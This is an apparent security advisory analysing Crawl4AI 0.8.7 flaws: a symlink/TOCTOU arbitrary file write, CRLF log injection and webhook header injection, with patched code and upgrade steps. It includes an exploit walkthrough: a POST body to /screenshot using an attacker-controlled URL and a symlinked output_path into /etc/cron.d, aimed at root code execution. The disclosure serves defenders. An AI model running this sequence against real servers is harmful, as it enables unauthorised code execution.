Jun 16, 2026 · 6 min read
Crawl4AI <= 0.8.7 suffers from path traversal via symlink resolution bypasses, leading to arbitrary file write and potential RCE. It also lacks validation for log streams and webhook headers, allowing log manipulation and request smuggling. Version 0.8.8 addresses these issues.
An in-depth technical analysis of multiple security vulnerabilities in the self-hosted Docker API server of Crawl4AI up to version 0.8.7. These flaws include a critical arbitrary file write via symlink traversal and TOCTOU weakness, CRLF log injection, webhook header injection, and SSRF filter gaps. These have been remediated in version 0.8.8.
The self-hosted Docker API server deployment of Crawl4AI (`crawl4ai`) provides high-performance web crawling that feeds web pages into Large Language Model (LLM) and Retrieval-Augmented Generation (RAG) pipelines.

To let users retrieve rendered visual assets, the API endpoints `/screenshot` and `/pdf` accept an optional parameter named `output_path`. This parameter determines where generated output files are saved on the container's filesystem.

In Crawl4AI version 0.8.7 and earlier, the path containment checks and request parameter validation were insufficient to protect the filesystem outside the designated output directory. This technical report details a primary Arbitrary File Write vulnerability caused by symlink following and a Time-of-Check to Time-of-Use (TOCTOU) weakness, alongside accompanying CRLF Log Injection, Webhook Request-Header Injection, and Server-Side Request Forgery (SSRF) filter bypasses.
The primary vulnerability stems from an insecure validation implementation in the `validate_output_path()` function in `deploy/docker/utils.py`. The function was designed to prevent path traversal (CWE-22) by checking whether the target path resolved within `ALLOWED_OUTPUT_DIR`. In version 0.8.7, however, this validation only performed a literal string comparison using Python's `startswith()` method.

Because the function did not resolve symbolic links (symlinks) with `os.path.realpath`, it accepted paths whose components were symlinks. An attacker who could create or reference a symlink inside `ALLOWED_OUTPUT_DIR` that pointed to an external directory (such as `/etc/cron.d` or `/usr/local/bin`) could bypass containment. The string form of the target path (e.g., `outputs/symlink_dir/malicious_file`) started with the allowed prefix, but the subsequent write followed the symlink and placed the output in the external target.

The file creation step was also vulnerable to a Time-of-Check to Time-of-Use (TOCTOU) race condition. Files were opened with a plain `open(..., 'wb')` and no defensive flags such as `O_NOFOLLOW`, so the filesystem followed any symlink present at the moment of the write, even if the destination had been checked immediately beforehand.

Separately, the webhook component was vulnerable to CRLF injection (CWE-93/CWE-113) because arbitrary custom headers from the request body were forwarded to outgoing HTTP requests without character sanitization.
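The gap between a string prefix check and a resolved-path check can be reproduced in isolation. The following is a minimal sketch, not the project's code: `naive_check`, `resolved_check`, and `demo` are hypothetical names, and the directory layout is built in a temporary directory purely for illustration.

```python
import os
import tempfile


def naive_check(abs_path: str, abs_allowed: str) -> bool:
    """String-only containment check, mirroring the behaviour described for 0.8.7."""
    return abs_path.startswith(abs_allowed)


def resolved_check(abs_path: str, abs_allowed: str) -> bool:
    """Containment check performed on symlink-resolved paths (illustrative only)."""
    real_allowed = os.path.realpath(abs_allowed)
    real_path = os.path.realpath(abs_path)
    return os.path.commonpath([real_path, real_allowed]) == real_allowed


def demo() -> tuple[bool, bool]:
    """Build outputs/link -> ../outside and evaluate both checks on a path through it."""
    with tempfile.TemporaryDirectory() as root:
        allowed = os.path.join(root, "outputs")
        outside = os.path.join(root, "outside")
        os.makedirs(allowed)
        os.makedirs(outside)
        os.symlink(outside, os.path.join(allowed, "link"))
        target = os.path.join(allowed, "link", "cron_job")
        return naive_check(target, allowed), resolved_check(target, allowed)
```

In this layout the string check accepts the path while the resolved check rejects it, which is the discrepancy the vulnerability relies on.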
To understand the exact changes made to remediate these flaws, consider the diff of `deploy/docker/utils.py`. The vulnerable containment check in version 0.8.7 was strictly string-based:

```python
# Vulnerable implementation in 0.8.7
if not abs_path.startswith(abs_allowed):
    raise HTTPException(...)
```

This code did not resolve symbolic links. In the patched version 0.8.8, the validation resolves the physical path by calling `os.path.realpath()` on the parent directory before verifying containment:

```python
# Hardened implementation in 0.8.8
real_parent = os.path.realpath(os.path.dirname(abs_path))
real_path = os.path.join(real_parent, os.path.basename(abs_path))
string_ok = abs_path.startswith(abs_allowed)
real_ok = (real_path + os.sep).startswith(abs_allowed)
if not (string_ok and real_ok):
    raise HTTPException(status_code=400, detail="output_path must resolve within allowed dir")
```

To address the TOCTOU symlink-following weakness, a new writing function, `write_output_file()`, was introduced. It opens the file with descriptor flags that include `os.O_NOFOLLOW`, which blocks symlink resolution at the final path component:

```python
import os

def write_output_file(abs_path: str, data: bytes) -> None:
    os.makedirs(os.path.dirname(abs_path), exist_ok=True)
    # O_NOFOLLOW makes the open fail if the final component is a symlink
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(abs_path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
```

Additionally, the log injection vulnerability (CWE-117) was remediated by registering a `CRLFSafeFilter` that strips carriage returns, newlines, and non-tab control characters from all logged records. Webhook handling was hardened by adding a strict regular-expression validator, `sanitize_webhook_headers()`, that blocks restricted headers (such as `Host` or `Cookie`) and rejects CRLF sequences in header names or values.
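The effect of `O_NOFOLLOW` can be observed directly. The sketch below is illustrative rather than part of the patch: `final_symlink_is_refused` is a hypothetical helper that plants a symlink as the final path component and attempts the same kind of `os.open` call. Note that `O_NOFOLLOW` only covers the last component of the path, which is why the patch pairs it with the `realpath` check on the parent directory.

```python
import os
import tempfile


def final_symlink_is_refused() -> bool:
    """Return True if os.open with O_NOFOLLOW rejects a symlink at the final component."""
    nofollow = getattr(os, "O_NOFOLLOW", 0)
    if not nofollow:
        return False  # the platform does not expose the flag
    with tempfile.TemporaryDirectory() as root:
        victim = os.path.join(root, "victim.txt")
        link = os.path.join(root, "out.png")
        with open(victim, "w") as f:
            f.write("original")
        os.symlink(victim, link)  # out.png -> victim.txt
        flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | nofollow
        try:
            fd = os.open(link, flags, 0o600)
        except OSError:
            # On Linux the failure is reported as ELOOP; the victim must be untouched.
            with open(victim) as f:
                return f.read() == "original"
        os.close(fd)
        return False
```

A plain `open(link, "wb")` in the same layout would truncate and overwrite `victim.txt` instead of failing.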
Exploiting the Arbitrary File Write vulnerability requires a multi-step sequence to achieve remote code execution in a Docker environment. The following Mermaid diagram shows how the path validation filter is bypassed:

```mermaid
graph LR
    A["POST /screenshot request"] --> B["Extract output_path parameter"]
    B --> C["validate_output_path() validation"]
    C --> D{"Is string prefix matching?"}
    D -- Yes --> E["Passes 0.8.7 startswith() check"]
    E --> F["Write file payload"]
    F --> G["Target OS resolves symlink"]
    G --> H["File written to /etc/cron.d (RCE)"]
```

To carry out this attack, the adversary needs a way to create a symbolic link inside the directory defined by `ALLOWED_OUTPUT_DIR`. Where a shared volume or a secondary write vector is present, the attacker creates a symbolic link `outputs/link` that points to a sensitive system directory such as `/etc/cron.d` or `/etc/logrotate.d`.

Once the symlink is in place, the attacker sends an unauthenticated POST request to `/screenshot` with the payload:

```json
{
  "url": "http://attacker-controlled-site.com/malicious_payload",
  "output_path": "link/cron_job"
}
```

The API server checks `outputs/link/cron_job` against the allowed prefix as a string. Because the path begins with the correct prefix, the check succeeds. The server then writes the screenshot output (or PDF document) to the target file. Because `link` resolves to `/etc/cron.d`, the file is written to `/etc/cron.d/cron_job`. A cron daemon running in the container (or on a host that shares that path) subsequently parses the file and executes the injected commands as the root user.
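Since the attack depends on a symlink already existing inside the output directory, operators can audit for that precondition. The following is a rough sketch under stated assumptions: `find_escaping_symlinks` is a hypothetical helper, not a Crawl4AI function, and the directory passed to it stands in for whatever `ALLOWED_OUTPUT_DIR` is set to in a given deployment.

```python
import os


def find_escaping_symlinks(allowed_dir: str) -> list[str]:
    """List symlinks under allowed_dir whose resolved target lies outside it."""
    real_allowed = os.path.realpath(allowed_dir)
    escaping = []
    # followlinks=False: symlinked directories are reported but not descended into
    for dirpath, dirnames, filenames in os.walk(allowed_dir, followlinks=False):
        for name in dirnames + filenames:
            candidate = os.path.join(dirpath, name)
            if not os.path.islink(candidate):
                continue
            target = os.path.realpath(candidate)
            if os.path.commonpath([target, real_allowed]) != real_allowed:
                escaping.append(candidate)
    return sorted(escaping)
```

Any path this returns is a link that a request such as the one above could write through on an unpatched server.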
The cumulative impact of the vulnerabilities disclosed under GHSA-7CX2-G3H9-382P is high. Through the primary Arbitrary File Write flaw, an unauthenticated attacker can write files to any writable location on the container filesystem. Combined with typical Docker configurations in which container services run as privileged users, this can lead directly to remote code execution (RCE) in the container.

The accompanying Webhook Header Injection vulnerability allows attackers to perform HTTP Request Smuggling, override critical headers such as `Host` or `Authorization`, and route internal requests to external attacker-controlled infrastructure, which exposes internal API keys and authorization tokens. The CRLF Log Injection flaw allows attackers to compromise log integrity by writing forged log entries, which can hide malicious activity or disrupt automated Security Information and Event Management (SIEM) processing.
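Both injection classes above come down to control characters surviving in attacker-supplied strings. The sketch below illustrates the general technique only; it is not the 0.8.8 implementation. The names `sanitize_webhook_headers_sketch` and `CRLFSafeFilterSketch` are hypothetical, and the denylist contains only the two headers the text names as examples.

```python
import logging
import re

# Control characters except tab; this range includes CR (\x0d) and LF (\x0a).
_CONTROL_CHARS = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")
# HTTP header names are "token" characters only (RFC 9110).
_HEADER_NAME = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# Assumption: illustrative denylist; the real restricted set may be larger.
_RESTRICTED = {"host", "cookie"}


def sanitize_webhook_headers_sketch(headers: dict[str, str]) -> dict[str, str]:
    """Reject restricted names, malformed names, and values with control characters."""
    clean = {}
    for name, value in headers.items():
        if not _HEADER_NAME.fullmatch(name):
            raise ValueError(f"invalid header name: {name!r}")
        if name.lower() in _RESTRICTED:
            raise ValueError(f"restricted header: {name!r}")
        if _CONTROL_CHARS.search(value):
            raise ValueError(f"control character in value of {name!r}")
        clean[name] = value
    return clean


class CRLFSafeFilterSketch(logging.Filter):
    """Strip CR, LF, and other non-tab control characters from each record."""

    def filter(self, record: logging.LogRecord) -> bool:
        # Render the message with its args first so injected arguments are covered.
        record.msg = _CONTROL_CHARS.sub("", record.getMessage())
        record.args = None
        return True
```

Rejecting bad headers outright, rather than silently rewriting them, keeps the webhook request from being sent in a form the caller did not intend; for logs, stripping is the safer default because the record still needs to be written.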
To remediate all security issues covered under GHSA-7CX2-G3H9-382P, administrators and developers should immediately upgrade Crawl4AI deployments to version 0.8.8 or later. If using the PyPI package directly, run the following command (the version specifier is quoted so the shell does not treat `>` as an output redirection):

```bash
pip install -U "crawl4ai>=0.8.8"
```

If using the official Docker container, pull the patched image:

```bash
docker pull unclecode/crawl4ai:0.8.8
```

As a temporary workaround or hardening measure, run the API container with a read-only root filesystem. This prevents write operations outside designated volume mounts, which neutralizes the path traversal RCE vector. In addition, enable API authentication using the `CRAWL4AI_API_TOKEN` environment variable so that all administrative endpoints require valid authentication before processing requests.
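After upgrading, the installed version can be checked programmatically. The following is a small sketch, assuming the distribution is installed under the name `crawl4ai` as in the `pip` command above; `parse_release`, `is_patched`, and `installed_is_patched` are hypothetical helper names, and pre-release or post-release suffixes are deliberately ignored.

```python
import re
from importlib import metadata
from typing import Optional

FIXED_RELEASE = (0, 8, 8)  # first fixed version according to the advisory


def parse_release(version: str) -> tuple[int, ...]:
    """Extract the leading numeric release components of a version string."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_patched(version: str) -> bool:
    """True if the release is at or above the fixed version (suffixes ignored)."""
    return parse_release(version) >= FIXED_RELEASE


def installed_is_patched(dist: str = "crawl4ai") -> Optional[bool]:
    """Check the installed distribution; None means it is not installed."""
    try:
        return is_patched(metadata.version(dist))
    except metadata.PackageNotFoundError:
        return None
```

A deployment script could call `installed_is_patched()` at startup and refuse to launch the API server when it returns `False`.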
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| crawl4ai (unclecode) | <= 0.8.7 | 0.8.8 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-59 (Link Following), CWE-22 (Path Traversal) |
| Attack Vector | Network (AV:N) |
| CVSS v3.1 Score | 8.1 (High) |
| EPSS Score | N/A (GitHub Security Advisory) |
| Impact | Arbitrary File Write / Remote Code Execution |
| Exploit Status | PoC |
| KEV Status | Not Listed |
The application does not properly resolve symbolic links before opening files, allowing arbitrary file writes outside the restricted container outputs directory.